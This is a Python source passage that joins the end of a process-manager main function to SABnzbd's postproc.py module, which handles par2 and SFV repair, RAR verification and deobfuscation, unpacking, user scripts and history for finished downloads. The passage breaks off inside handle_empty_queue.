        spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
                                        cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
                                        close_fds=True)
    try:
        manager_update()
        manager_init()
        manager_prepare()
    finally:
        if spinner_proc:
            spinner_proc.terminate()

    if os.getenv("PREPAREONLY") is not None:
        return

    # SystemExit on sigterm
    signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))

    try:
        manager_thread()
    except Exception:
        traceback.print_exc()
        crash.capture_exception()
    finally:
        cleanup_all_processes(None, None)

    if params.get("DoUninstall") == "1":
        uninstall()
if __name__ == "__main__":
    main()

    # manual exit because we are forked
    sys.exit(0)
|
postproc.py | #!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.postproc - threaded post-processing of jobs
"""
import os
import logging
import sabnzbd
import functools
import time
import re
import queue
from sabnzbd.newsunpack import (
unpack_magic,
par2_repair,
external_processing,
sfv_check,
build_filelists,
rar_sort,
is_sfv_file,
)
from threading import Thread
from sabnzbd.misc import on_cleanup_list
from sabnzbd.filesystem import (
real_path,
get_unique_path,
move_to_path,
make_script_path,
long_path,
clip_path,
renamer,
remove_dir,
globber,
globber_full,
set_permissions,
cleanup_empty_directories,
fix_unix_encoding,
sanitize_and_trim_path,
sanitize_files_in_folder,
remove_file,
recursive_listdir,
setname_from_path,
create_all_dirs,
get_unique_filename,
)
from sabnzbd.sorting import Sorter
from sabnzbd.constants import (
REPAIR_PRIORITY,
TOP_PRIORITY,
POSTPROC_QUEUE_FILE_NAME,
POSTPROC_QUEUE_VERSION,
sample_match,
JOB_ADMIN,
Status,
VERIFIED_FILE,
)
from sabnzbd.rating import Rating
import sabnzbd.emailer as emailer
import sabnzbd.dirscanner as dirscanner
import sabnzbd.downloader
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.encoding as encoding
import sabnzbd.nzbqueue
import sabnzbd.database as database
import sabnzbd.notifier as notifier
import sabnzbd.utils.rarfile as rarfile
import sabnzbd.utils.rarvolinfo as rarvolinfo
import sabnzbd.utils.checkdir
# How many fast-queue jobs may run back-to-back before a slow job gets a turn
MAX_FAST_JOB_COUNT = 3

# Match samples
RE_SAMPLE = re.compile(sample_match, re.I)
class PostProcessor(Thread):
    """ PostProcessor thread, designed as Singleton """

    do = None  # Link to instance of the thread

    def __init__(self):
        """ Initialize PostProcessor thread """
        Thread.__init__(self)

        # This history queue is simply used to log what active items to display in the web_ui
        self.load()
        if self.history_queue is None:
            self.history_queue = []

        # Fast-queue for jobs already finished by DirectUnpack
        self.fast_queue = queue.Queue()

        # Regular queue for jobs that might need more attention
        self.slow_queue = queue.Queue()

        # Load all old jobs
        for nzo in self.history_queue:
            self.process(nzo)

        # Counter to not only process fast-jobs
        self.__fast_job_count = 0

        # State variables
        self.__stop = False
        self.__busy = False
        self.paused = False
        PostProcessor.do = self

    def save(self):
        """ Save postproc queue """
        logging.info("Saving postproc queue")
        sabnzbd.save_admin((POSTPROC_QUEUE_VERSION, self.history_queue), POSTPROC_QUEUE_FILE_NAME)

    def load(self):
        """ Load postproc queue from disk """
        self.history_queue = []
        logging.info("Loading postproc queue")
        data = sabnzbd.load_admin(POSTPROC_QUEUE_FILE_NAME)
        if data is None:
            return
        try:
            version, history_queue = data
            if POSTPROC_QUEUE_VERSION != version:
                logging.warning(T("Old queue detected, use Status->Repair to convert the queue"))
            elif isinstance(history_queue, list):
                # only keep jobs whose download folder still exists on disk
                self.history_queue = [nzo for nzo in history_queue if os.path.exists(nzo.downpath)]
        except:
            logging.info("Corrupt %s file, discarding", POSTPROC_QUEUE_FILE_NAME)
            logging.info("Traceback: ", exc_info=True)

    def delete(self, nzo_id, del_files=False):
        """ Remove a job from the post processor queue """
        for nzo in self.history_queue:
            if nzo.nzo_id == nzo_id:
                if nzo.status in (Status.FAILED, Status.COMPLETED):
                    # already processed: flag for removal by the run loop
                    nzo.to_be_removed = True
                elif nzo.status in (Status.DOWNLOADING, Status.QUEUED):
                    self.remove(nzo)
                    nzo.purge_data(delete_all_data=del_files)
                    logging.info("Removed job %s from postproc queue", nzo.final_name)
                    nzo.work_name = ""  # Mark as deleted job
                break

    def process(self, nzo):
        """ Push on finished job in the queue """
        if nzo not in self.history_queue:
            self.history_queue.append(nzo)

        # Fast-track if it has DirectUnpacked jobs or if it's still going
        if nzo.direct_unpacker and (nzo.direct_unpacker.success_sets or not nzo.direct_unpacker.killed):
            self.fast_queue.put(nzo)
        else:
            self.slow_queue.put(nzo)
        self.save()
        sabnzbd.history_updated()

    def remove(self, nzo):
        """ Remove given nzo from the queue """
        try:
            self.history_queue.remove(nzo)
        except:
            # nzo may already be gone; removal is best-effort
            pass
        self.save()
        sabnzbd.history_updated()

    def stop(self):
        """ Stop thread after finishing running job """
        self.__stop = True
        # sentinel None wakes up both queue reads in run()
        self.slow_queue.put(None)
        self.fast_queue.put(None)

    def cancel_pp(self, nzo_id):
        """ Change the status, so that the PP is canceled """
        for nzo in self.history_queue:
            if nzo.nzo_id == nzo_id:
                nzo.abort_direct_unpacker()
                if nzo.pp_active:
                    nzo.pp_active = False
                return True
        return None

    def empty(self):
        """ Return True if pp queue is empty """
        return self.slow_queue.empty() and self.fast_queue.empty() and not self.__busy

    def get_queue(self):
        """ Return list of NZOs that still need to be processed """
        return [nzo for nzo in self.history_queue if nzo.work_name]

    def get_path(self, nzo_id):
        """ Return download path for given nzo_id or None when not found """
        for nzo in self.history_queue:
            if nzo.nzo_id == nzo_id:
                return nzo.downpath
        return None

    def run(self):
        """ Postprocessor loop """
        # First we do a dircheck
        complete_dir = sabnzbd.cfg.complete_dir.get_path()
        if sabnzbd.utils.checkdir.isFAT(complete_dir):
            logging.warning(
                T("Completed Download Folder %s is on FAT file system, limiting maximum file size to 4GB")
                % complete_dir
            )
        else:
            logging.info("Completed Download Folder %s is not on FAT", complete_dir)

        # Start looping
        check_eoq = False
        while not self.__stop:
            self.__busy = False

            if self.paused:
                time.sleep(5)
                continue

            # Something in the fast queue?
            try:
                # Every few fast-jobs we should check allow a
                # slow job so that they don't wait forever
                if self.__fast_job_count >= MAX_FAST_JOB_COUNT and self.slow_queue.qsize():
                    raise queue.Empty

                nzo = self.fast_queue.get(timeout=2)
                self.__fast_job_count += 1
            except queue.Empty:
                # Try the slow queue
                try:
                    nzo = self.slow_queue.get(timeout=2)
                    # Reset fast-counter
                    self.__fast_job_count = 0
                except queue.Empty:
                    # Check for empty queue
                    if check_eoq:
                        check_eoq = False
                        handle_empty_queue()
                    # No fast or slow jobs, better luck next loop!
                    continue

            # Stop job (None sentinel pushed by stop())
            if not nzo:
                continue

            # Job was already deleted.
            if not nzo.work_name:
                check_eoq = True
                continue

            # Flag NZO as being processed
            nzo.pp_active = True

            # Pause downloader, if users wants that
            if cfg.pause_on_post_processing():
                sabnzbd.downloader.Downloader.do.wait_for_postproc()

            self.__busy = True

            process_job(nzo)

            if nzo.to_be_removed:
                history_db = database.HistoryDB()
                history_db.remove_history(nzo.nzo_id)
                history_db.close()
                nzo.purge_data()

            # Processing done
            nzo.pp_active = False

            self.remove(nzo)
            check_eoq = True

            # Allow download to proceed
            sabnzbd.downloader.Downloader.do.resume_from_postproc()
def process_job(nzo):
    """ Process one job

    Full post-processing pipeline for a finished download:
    availability check, par2 verify/repair, unpack, move to the
    completed folder, sorting, user script, e-mail notification and
    history bookkeeping.

    Returns False when the job was re-queued to fetch extra par2
    blocks, True otherwise (success or failure is reflected in
    nzo.status, not in the return value).
    """
    start = time.time()

    # keep track of whether we can continue
    all_ok = True
    # keep track of par problems
    par_error = False
    # keep track of any unpacking errors
    unpack_error = False
    # Signal empty download, for when 'empty_postproc' is enabled
    empty = False
    nzb_list = []
    # These need to be initialized in case of a crash
    workdir_complete = ""
    script_log = ""
    script_line = ""

    # Get the job flags
    nzo.save_attribs()
    flag_repair, flag_unpack, flag_delete = nzo.repair_opts
    # Normalize PP: delete implies unpack, unpack implies repair
    if flag_delete:
        flag_unpack = True
    if flag_unpack:
        flag_repair = True

    # Get the NZB name
    filename = nzo.final_name

    if nzo.fail_msg:  # Special case: aborted due to too many missing data
        nzo.status = Status.FAILED
        nzo.save_attribs()
        all_ok = False
        par_error = True
        unpack_error = 1

    try:
        # Get the folder containing the download result
        workdir = nzo.downpath
        tmp_workdir_complete = None

        # if no files are present (except __admin__), fail the job
        if all_ok and len(globber(workdir)) < 2:
            if nzo.precheck:
                _enough, ratio = nzo.check_availability_ratio()
                req_ratio = float(cfg.req_completion_rate()) / 100.0
                # Make sure that rounded ratio doesn't equal required ratio
                # when it is actually below required
                if (ratio < req_ratio) and (req_ratio - ratio) < 0.001:
                    ratio = req_ratio - 0.001
                emsg = "%.1f%%" % (ratio * 100.0)
                emsg2 = "%.1f%%" % float(cfg.req_completion_rate())
                emsg = T("Download might fail, only %s of required %s available") % (emsg, emsg2)
            else:
                emsg = T("Download failed - Not on your server(s)")
                empty = True
            emsg += " - https://sabnzbd.org/not-complete"
            nzo.fail_msg = emsg
            nzo.set_unpack_info("Fail", emsg)
            nzo.status = Status.FAILED
            # do not run unpacking or parity verification
            flag_repair = flag_unpack = False
            all_ok = cfg.empty_postproc() and empty
            if not all_ok:
                par_error = True
                unpack_error = 1

        script = nzo.script
        logging.info(
            "Starting Post-Processing on %s => Repair:%s, Unpack:%s, Delete:%s, Script:%s, Cat:%s",
            filename,
            flag_repair,
            flag_unpack,
            flag_delete,
            script,
            nzo.cat,
        )

        # Set complete dir to workdir in case we need to abort
        workdir_complete = workdir

        # Par processing, if enabled
        if all_ok and flag_repair:
            par_error, re_add = parring(nzo, workdir)
            if re_add:
                # Try to get more par files
                return False

        # If we don't need extra par2, we can disconnect
        if sabnzbd.nzbqueue.NzbQueue.do.actives(grabs=False) == 0 and cfg.autodisconnect():
            # This was the last job, close server connections
            sabnzbd.downloader.Downloader.do.disconnect()

        # Sanitize the resulting files
        if sabnzbd.WIN32:
            sanitize_files_in_folder(workdir)

        # Check if user allows unsafe post-processing
        if flag_repair and cfg.safe_postproc():
            all_ok = all_ok and not par_error

        if all_ok:
            # Fix encodings
            fix_unix_encoding(workdir)

            # Use dirs generated by direct-unpacker
            if nzo.direct_unpacker and nzo.direct_unpacker.unpack_dir_info:
                (
                    tmp_workdir_complete,
                    workdir_complete,
                    file_sorter,
                    one_folder,
                    marker_file,
                ) = nzo.direct_unpacker.unpack_dir_info
            else:
                # Generate extraction path
                tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = prepare_extraction_path(
                    nzo
                )

        newfiles = []
        # Run Stage 2: Unpack
        if flag_unpack:
            # Set the current nzo status to "Extracting...". Used in History
            nzo.status = Status.EXTRACTING
            logging.info("Running unpack_magic on %s", filename)
            unpack_error, newfiles = unpack_magic(
                nzo, workdir, tmp_workdir_complete, flag_delete, one_folder, (), (), (), (), ()
            )
            logging.info("Unpacked files %s", newfiles)

            if sabnzbd.WIN32:
                # Sanitize the resulting files
                newfiles = sanitize_files_in_folder(tmp_workdir_complete)
            logging.info("Finished unpack_magic on %s", filename)

        if cfg.safe_postproc():
            all_ok = all_ok and not unpack_error

        if all_ok:
            # Move any (left-over) files to destination
            nzo.status = Status.MOVING
            nzo.set_action_line(T("Moving"), "...")
            for root, _dirs, files in os.walk(workdir):
                if not root.endswith(JOB_ADMIN):
                    for file_ in files:
                        path = os.path.join(root, file_)
                        new_path = path.replace(workdir, tmp_workdir_complete)
                        ok, new_path = move_to_path(path, new_path)
                        if new_path:
                            newfiles.append(new_path)
                        if not ok:
                            nzo.set_unpack_info("Unpack", T("Failed moving %s to %s") % (path, new_path))
                            all_ok = False
                            break

            # Set permissions right
            set_permissions(tmp_workdir_complete)

        if all_ok and marker_file:
            del_marker(os.path.join(tmp_workdir_complete, marker_file))
            remove_from_list(marker_file, newfiles)

        if all_ok:
            # Remove files matching the cleanup list
            cleanup_list(tmp_workdir_complete, skip_nzb=True)

            # Check if this is an NZB-only download, if so redirect to queue
            # except when PP was Download-only
            if flag_repair:
                nzb_list = nzb_redirect(
                    tmp_workdir_complete, nzo.final_name, nzo.pp, script, nzo.cat, priority=nzo.priority
                )
            else:
                nzb_list = None
            if nzb_list:
                nzo.set_unpack_info("Download", T("Sent %s to queue") % nzb_list)
                cleanup_empty_directories(tmp_workdir_complete)
            else:
                # Full cleanup including nzb's
                cleanup_list(tmp_workdir_complete, skip_nzb=False)

        script_output = ""
        script_ret = 0
        if not nzb_list:
            # Give destination its final name
            if cfg.folder_rename() and tmp_workdir_complete and not one_folder:
                if all_ok:
                    try:
                        newfiles = rename_and_collapse_folder(tmp_workdir_complete, workdir_complete, newfiles)
                    except:
                        logging.error(
                            T('Error renaming "%s" to "%s"'),
                            clip_path(tmp_workdir_complete),
                            clip_path(workdir_complete),
                        )
                        logging.info("Traceback: ", exc_info=True)
                        # Better disable sorting because filenames are all off now
                        file_sorter.sort_file = None
                else:
                    workdir_complete = tmp_workdir_complete.replace("_UNPACK_", "_FAILED_")
                    workdir_complete = get_unique_path(workdir_complete, n=0, create_dir=False)

            # job_result encodes the outcome for the user script:
            # -1 empty, bit 0 = par error, bit 1 = unpack error
            if empty:
                job_result = -1
            else:
                job_result = int(par_error) + int(bool(unpack_error)) * 2

            if cfg.ignore_samples():
                remove_samples(workdir_complete)

            # TV/Movie/Date Renaming code part 2 - rename and move files to parent folder
            if all_ok and file_sorter.sort_file:
                if newfiles:
                    file_sorter.rename(newfiles, workdir_complete)
                    workdir_complete, ok = file_sorter.move(workdir_complete)
                else:
                    workdir_complete, ok = file_sorter.rename_with_ext(workdir_complete)
                if not ok:
                    nzo.set_unpack_info("Unpack", T("Failed to move files"))
                    all_ok = False

            # Run the user script
            script_path = make_script_path(script)
            if (all_ok or not cfg.safe_postproc()) and (not nzb_list) and script_path:
                # Set the current nzo status to "Ext Script...". Used in History
                nzo.status = Status.RUNNING
                nzo.set_action_line(T("Running script"), script)
                nzo.set_unpack_info("Script", T("Running user script %s") % script, unique=True)
                script_log, script_ret = external_processing(
                    script_path, nzo, clip_path(workdir_complete), nzo.final_name, job_result
                )
                script_line = get_last_line(script_log)
                if script_log:
                    script_output = nzo.nzo_id
                if script_line:
                    nzo.set_unpack_info("Script", script_line, unique=True)
                else:
                    nzo.set_unpack_info("Script", T("Ran %s") % script, unique=True)
            else:
                script = ""
                script_line = ""
                script_ret = 0

        # Maybe bad script result should fail job
        if script_ret and cfg.script_can_fail():
            script_error = True
            all_ok = False
            nzo.fail_msg = T("Script exit code is %s") % script_ret
        else:
            script_error = False

        # Email the results
        if (not nzb_list) and cfg.email_endjob():
            if (cfg.email_endjob() == 1) or (cfg.email_endjob() == 2 and (unpack_error or par_error or script_error)):
                emailer.endjob(
                    nzo.final_name,
                    nzo.cat,
                    all_ok,
                    workdir_complete,
                    nzo.bytes_downloaded,
                    nzo.fail_msg,
                    nzo.unpack_info,
                    script,
                    script_log,
                    script_ret,
                )

        if script_output:
            # Can do this only now, otherwise it would show up in the email
            if script_ret:
                script_ret = "Exit(%s) " % script_ret
            else:
                script_ret = ""
            if len(script_log.rstrip().split("\n")) > 1:
                nzo.set_unpack_info(
                    "Script",
                    '%s%s <a href="./scriptlog?name=%s">(%s)</a>'
                    % (script_ret, script_line, encoding.xml_name(script_output), T("More")),
                    unique=True,
                )
            else:
                # No '(more)' button needed
                nzo.set_unpack_info("Script", "%s%s " % (script_ret, script_line), unique=True)

        # Cleanup again, including NZB files
        if all_ok:
            cleanup_list(workdir_complete, False)

        # Force error for empty result
        all_ok = all_ok and not empty

        # Update indexer with results
        if cfg.rating_enable():
            if nzo.encrypted > 0:
                Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_ENCRYPTED)
            if empty:
                hosts = [s.host for s in sabnzbd.downloader.Downloader.do.nzo_servers(nzo)]
                if not hosts:
                    hosts = [None]
                for host in hosts:
                    Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_EXPIRED, host)

    except:
        # Catch-all so one broken job cannot kill the postprocessor thread
        logging.error(T("Post Processing Failed for %s (%s)"), filename, T("see logfile"))
        logging.info("Traceback: ", exc_info=True)
        nzo.fail_msg = T("PostProcessing was aborted (%s)") % T("see logfile")
        notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
        nzo.status = Status.FAILED
        par_error = True
        all_ok = False

        if cfg.email_endjob():
            emailer.endjob(
                nzo.final_name,
                nzo.cat,
                all_ok,
                clip_path(workdir_complete),
                nzo.bytes_downloaded,
                nzo.fail_msg,
                nzo.unpack_info,
                "",
                "",
                0,
            )

    if all_ok:
        # If the folder only contains one file OR folder, have that as the path
        # Be aware that series/generic/date sorting may move a single file into a folder containing other files
        workdir_complete = one_file_or_folder(workdir_complete)
        workdir_complete = os.path.normpath(workdir_complete)

    # Clean up the NZO data
    try:
        nzo.purge_data(delete_all_data=all_ok)
    except:
        logging.error(T("Cleanup of %s failed."), nzo.final_name)
        logging.info("Traceback: ", exc_info=True)

    # Use automatic retry link on par2 errors and encrypted/bad RARs
    if par_error or unpack_error in (2, 3):
        try_alt_nzb(nzo)

    # Show final status in history
    if all_ok:
        notifier.send_notification(T("Download Completed"), filename, "complete", nzo.cat)
        nzo.status = Status.COMPLETED
    else:
        notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
        nzo.status = Status.FAILED

    # Log the overall time taken for postprocessing
    postproc_time = int(time.time() - start)

    # Create the history DB instance
    history_db = database.HistoryDB()
    # Add the nzo to the database. Only the path, script and time taken is passed
    # Other information is obtained from the nzo
    history_db.add_history_db(nzo, clip_path(workdir_complete), nzo.downpath, postproc_time, script_log, script_line)
    # Purge items
    history_db.auto_history_purge()
    # The connection is only used once, so close it here
    history_db.close()
    sabnzbd.history_updated()
    return True
def prepare_extraction_path(nzo):
    """ Based on the information that we have, generate
    the extraction path and create the directory.
    Separated so it can be called from DirectUnpacker

    Returns (tmp_workdir_complete, workdir_complete, file_sorter,
    one_folder, marker_file); tmp_workdir_complete is the "_UNPACK_"
    staging folder, workdir_complete the intended final folder.
    """
    one_folder = False
    marker_file = None
    # Determine class directory
    catdir = config.get_categories(nzo.cat).dir()
    # A trailing "*" on the category dir means: unpack directly into it
    if catdir.endswith("*"):
        catdir = catdir.strip("*")
        one_folder = True
    complete_dir = real_path(cfg.complete_dir.get_path(), catdir)
    complete_dir = long_path(complete_dir)

    # TV/Movie/Date Renaming code part 1 - detect and construct paths
    if cfg.enable_meta():
        file_sorter = Sorter(nzo, nzo.cat)
    else:
        file_sorter = Sorter(None, nzo.cat)
    complete_dir = file_sorter.detect(nzo.final_name, complete_dir)
    if file_sorter.sort_file:
        # Sorting needs a job folder of its own
        one_folder = False

    complete_dir = sanitize_and_trim_path(complete_dir)

    if one_folder:
        workdir_complete = create_all_dirs(complete_dir, umask=True)
    else:
        workdir_complete = get_unique_path(os.path.join(complete_dir, nzo.final_name), create_dir=True)
        marker_file = set_marker(workdir_complete)

    if not workdir_complete or not os.path.exists(workdir_complete):
        logging.error(T("Cannot create final folder %s") % os.path.join(complete_dir, nzo.final_name))
        raise IOError

    if cfg.folder_rename() and not one_folder:
        prefixed_path = prefix(workdir_complete, "_UNPACK_")
        tmp_workdir_complete = get_unique_path(prefix(workdir_complete, "_UNPACK_"), create_dir=False)
        try:
            renamer(workdir_complete, tmp_workdir_complete)
        except:
            pass  # On failure, just use the original name

        # Is the unique path different? Then we also need to modify the final path
        if prefixed_path != tmp_workdir_complete:
            workdir_complete = workdir_complete + os.path.splitext(tmp_workdir_complete)[1]
    else:
        tmp_workdir_complete = workdir_complete

    return tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file
def parring(nzo, workdir):
    """ Perform par processing. Returns: (par_error, re_add)

    par_error: True when any set failed verification/repair.
    re_add: True when extra par2 blocks are needed and the job was
    re-queued by the caller.
    Verification results are persisted per set in VERIFIED_FILE so
    retried jobs skip sets that already passed.
    """
    job_name = nzo.final_name
    notifier.send_notification(T("Post-processing"), job_name, "pp", nzo.cat)
    logging.info("Starting verification and repair of %s", job_name)

    # Get verification status of sets
    verified = sabnzbd.load_data(VERIFIED_FILE, nzo.workpath, remove=False) or {}
    re_add = False
    par_error = False
    single = len(nzo.extrapars) == 1

    if nzo.extrapars:
        # Need to make a copy because it can change during iteration
        for setname in list(nzo.extrapars):
            if cfg.ignore_samples() and RE_SAMPLE.search(setname.lower()):
                continue
            # Skip sets that were already tried
            if not verified.get(setname, False):
                logging.info("Running verification and repair on set %s", setname)
                parfile_nzf = nzo.partable[setname]

                # Check if file maybe wasn't deleted and if we maybe have more files in the parset
                if os.path.exists(os.path.join(nzo.downpath, parfile_nzf.filename)) or nzo.extrapars[setname]:
                    need_re_add, res = par2_repair(parfile_nzf, nzo, workdir, setname, single=single)

                    # Was it aborted?
                    if not nzo.pp_active:
                        re_add = False
                        par_error = True
                        break

                    re_add = re_add or need_re_add
                    verified[setname] = res
                else:
                    continue
                par_error = par_error or not res
    elif not verified.get("", False):
        # No par2-sets found, skipped if already tried before
        logging.info("No par2 sets for %s", job_name)
        nzo.set_unpack_info("Repair", T("[%s] No par2 sets") % job_name)

        # Try SFV-based verification and rename
        sfv_check_result = None
        if cfg.sfv_check() and not verified.get("", False):
            sfv_check_result = try_sfv_check(nzo, workdir)
            par_error = sfv_check_result is False

        # If no luck with SFV, do RAR-check or RAR-rename
        if sfv_check_result is None and cfg.enable_unrar():
            _, _, rars, _, _ = build_filelists(workdir)
            # If there's no RAR's, they might be super-obfuscated
            if not rars:
                # Returns number of renamed RAR's
                if rar_renamer(nzo, workdir):
                    # Re-parse the files so we can do RAR-check
                    _, _, rars, _, _ = build_filelists(workdir)
            if rars:
                par_error = not try_rar_check(nzo, rars)
        # Save that we already tried SFV/RAR-verification (empty key = whole job)
        verified[""] = not par_error

    if re_add:
        logging.info("Re-added %s to queue", job_name)
        if nzo.priority != TOP_PRIORITY:
            nzo.priority = REPAIR_PRIORITY
        nzo.status = Status.FETCHING
        sabnzbd.nzbqueue.NzbQueue.do.add(nzo)
        sabnzbd.downloader.Downloader.do.resume_from_postproc()

    sabnzbd.save_data(verified, VERIFIED_FILE, nzo.workpath)
    logging.info("Verification and repair finished for %s", job_name)
    return par_error, re_add
def try_sfv_check(nzo, workdir):
    """ Attempt to verify set using SFV file
    Return None if no SFV-sets, True/False based on verification
    """
    # Get list of SFV names
    sfvs = globber_full(workdir, "*.sfv")

    # If no files named *.sfv, lets search for obfuscated SFV files
    if not sfvs:
        files = globber_full(workdir, "*")
        for file in files:
            if is_sfv_file(file):
                logging.debug("Found and will use obfuscated SFV file: %s", file)
                sfvs.append(file)
        if not sfvs:
            # still no SFV, so:
            return None

    result = sfv_check(sfvs, nzo, workdir)
    if not result:
        # Mark the job failed and record which SFV files were used
        print_sfv = [os.path.basename(sfv) for sfv in sfvs]
        fail_msg = T('Some files failed to verify against "%s"') % "; ".join(print_sfv)
        nzo.set_unpack_info("Repair", fail_msg)
        nzo.status = Status.FAILED
        nzo.fail_msg = fail_msg
        return False

    # Success
    nzo.set_unpack_info("Repair", T("Verified successfully using SFV files"))
    return True
def try_rar_check(nzo, rars):
    """ Attempt to verify set using the RARs
    Return True if verified, False when failed
    When setname is '', all RAR files will be used, otherwise only the matching one
    If no RAR's are found, returns True
    """
    # Sort for better processing
    rars.sort(key=functools.cmp_to_key(rar_sort))

    # Test
    if rars:
        setname = setname_from_path(rars[0])
        nzo.status = Status.VERIFYING
        nzo.set_unpack_info("Repair", T("Trying RAR-based verification"), setname)
        nzo.set_action_line(T("Trying RAR-based verification"), "...")
        try:
            # Set path to unrar and open the file
            # Requires de-unicode for RarFile to work!
            rarfile.UNRAR_TOOL = sabnzbd.newsunpack.RAR_COMMAND
            zf = rarfile.RarFile(rars[0])

            # Skip if it's encrypted: cannot test without the password,
            # so treat as verified and let unpack deal with it
            if zf.needs_password():
                msg = T("[%s] RAR-based verification failed: %s") % (setname, T("Passworded"))
                nzo.set_unpack_info("Repair", msg)
                return True

            # Will throw exception if something is wrong
            zf.testrar()
            # Success!
            msg = T("RAR files verified successfully")
            nzo.set_unpack_info("Repair", msg, setname)
            logging.info(msg)
            return True
        except rarfile.Error as e:
            nzo.fail_msg = T("RAR files failed to verify")
            msg = T("[%s] RAR-based verification failed: %s") % (setname, e)
            nzo.set_unpack_info("Repair", msg, setname)
            logging.info(msg)
            return False
    else:
        # No rar-files, so just continue
        return True
def rar_renamer(nzo, workdir):
    """ Deobfuscate rar file names: Use header and content information to give RAR-files decent names

    Returns the number of RAR files that were renamed (0 when no RAR
    volumes were detected in workdir).
    """
    nzo.status = Status.VERIFYING
    nzo.set_unpack_info("Repair", T("Trying RAR-based verification"))
    nzo.set_action_line(T("Trying RAR-based verification"), "...")
    renamed_files = 0

    # This is the most important datastructure (in case of mixed obfuscated rarsets)
    rarvolnr = {}
    # rarvolnr will contain per rar vol number the rarfilenames and their respective contents (and maybe other characteristics, like filesizes).
    # for example: rarvolnr[6]['somerandomfilename.rar']={'readme.txt', 'linux.iso'},
    # which means 'somerandomfilename.rar' has rarvolnumber 6, and contents 'readme.txt' and 'linux.iso'
    # if we find a rarfile with rarvolnumber 7, and 'linux.iso' in it, we have a match!

    # The volume number and real extension of a (obfuscated) rar file
    # so volnrext['dfakjldfalkjdfl.blabla'] = (14, 'part014.rar') or (2, 'r000')
    # Not really needed, but handy to avoid a second lookup at the renaming
    volnrext = {}

    # Scan rar files in workdir, but not subdirs
    workdir_files = os.listdir(workdir)
    for file_to_check in workdir_files:
        file_to_check = os.path.join(workdir, file_to_check)

        # We only want files:
        if not (os.path.isfile(file_to_check)):
            continue

        # The function will check if it's a RAR-file
        # We do a sanity-check for the returned number
        rar_vol, new_extension = rarvolinfo.get_rar_extension(file_to_check)
        if 0 < rar_vol < 1000:
            logging.debug("Detected volume-number %s from RAR-header: %s ", rar_vol, file_to_check)
            volnrext[file_to_check] = (rar_vol, new_extension)
            # The files inside rar file
            rar_contents = rarfile.RarFile(os.path.join(workdir, file_to_check), single_file_check=True).filelist()
            try:
                rarvolnr[rar_vol]
            except:
                # does not yet exist, so create:
                rarvolnr[rar_vol] = {}
            rarvolnr[rar_vol][file_to_check] = rar_contents  # store them for matching (if needed)
        else:
            logging.debug("No RAR-volume-number found in %s", file_to_check)

    logging.debug("Deobfuscate: rarvolnr is: %s", rarvolnr)
    logging.debug("Deobfuscate: volnrext is: %s", volnrext)

    # Could be that there are no rar-files, we stop
    if not len(rarvolnr):
        return renamed_files

    # Check number of different obfuscated rar sets:
    numberofrarsets = len(rarvolnr[1])
    if numberofrarsets == 1:
        # Just one obfuscated rarset
        logging.debug("Deobfuscate: Just one obfuscated rarset")
        for filename in volnrext:
            new_rar_name = "%s.%s" % (nzo.final_name, volnrext[filename][1])
            new_rar_name = os.path.join(workdir, new_rar_name)
            new_rar_name = get_unique_filename(new_rar_name)
            logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
            renamer(filename, new_rar_name)
            renamed_files += 1
    else:
        # More than one obfuscated rarset, so we must do matching based of files inside the rar files
        logging.debug("Number of obfuscated rarsets: %s", numberofrarsets)

        # Assign (random) rar set names
        rarsetname = {}  # in which rar set it should be, so rar set 'A', or 'B', or ...
        mychar = "A"
        # First things first: Assigning a rarsetname to the rar file which have volume number 1
        for base_obfuscated_filename in rarvolnr[1]:
            rarsetname[base_obfuscated_filename] = mychar + "--" + nzo.final_name
            mychar = chr(ord(mychar) + 1)
        logging.debug("Deobfuscate: rarsetname %s", rarsetname)

        # Do the matching, layer by layer (read: rarvolnumber)
        # So, all rar files with rarvolnr 1, find the contents (files inside the rar),
        # and match with rarfiles with rarvolnr 2, and put them in the correct rarset.
        # And so on, until the highest rarvolnr minus 1 matched against highest rarvolnr
        for n in range(1, len(rarvolnr.keys())):
            logging.debug("Deobfuscate: Finding matches between rar sets %s and %s" % (n, n + 1))
            for base_obfuscated_filename in rarvolnr[n]:
                matchcounter = 0
                for next_obfuscated_filename in rarvolnr[n + 1]:
                    # set() method with intersection (less strict): set(rarvolnr[n][base_obfuscated_filename]).intersection(set(rarvolnr[n+1][next_obfuscated_filename]))
                    # check if the last filename inside the existing rar matches with the first filename in the following rar
                    if rarvolnr[n][base_obfuscated_filename][-1] == rarvolnr[n + 1][next_obfuscated_filename][0]:
                        try:
                            rarsetname[next_obfuscated_filename] = rarsetname[base_obfuscated_filename]
                            matchcounter += 1
                        except KeyError:
                            logging.warning("No matching earlier rar file for %s", next_obfuscated_filename)
                if matchcounter > 1:
                    logging.info("Deobfuscate: more than one match, so risk on false positive matching.")

        # Do the renaming:
        for filename in rarsetname:
            new_rar_name = "%s.%s" % (rarsetname[filename], volnrext[filename][1])
            new_rar_name = os.path.join(workdir, new_rar_name)
            new_rar_name = get_unique_filename(new_rar_name)
            logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
            renamer(filename, new_rar_name)
            renamed_files += 1

    # Done: The obfuscated rar files have now been renamed to regular formatted filenames
    return renamed_files
def handle_empty_queue():
    """ Check if empty queue calls for action

    Saves state, notifies the user and runs the configured
    end-of-queue action (script with argument, or plain callable in a
    thread), then re-arms the action setting.
    """
    if sabnzbd.nzbqueue.NzbQueue.do.actives() == 0:
